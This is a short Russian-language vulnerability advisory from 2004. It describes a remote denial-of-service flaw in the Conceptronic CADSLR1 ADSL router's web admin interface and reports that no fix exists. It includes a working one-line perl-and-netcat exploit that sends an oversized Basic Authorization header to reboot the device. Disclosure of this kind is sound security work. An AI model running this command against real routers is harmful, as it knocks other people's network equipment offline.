Удаленный DoS против Conceptronic ADSL маршрутизатора

Дата публикации:
22.07.2004
Всего просмотров:
1050
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Conceptronic ADSL Router Model CADSLR1; 3.04n

Описание: Уязвимость в Conceptronic ADSL маршрутизаторах позволяет удаленному пользователю перезагрузить устройство.

Удаленный пользователь может послать HTTP Basic Authentication строку длиннее 65535 байт к административному Web интерфейсу, чтобы перезагрузить целевой маршрутизатор.

Пример/Эксплоит:

$ $victima="ip.victim"
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization: Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80

URL производителя:http://www.conceptronic.net/product3.asp?g=5&p=*CADSLR1

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Denial of Service in Conceptronic CADSLR1 Router

или введите имя

CAPTCHA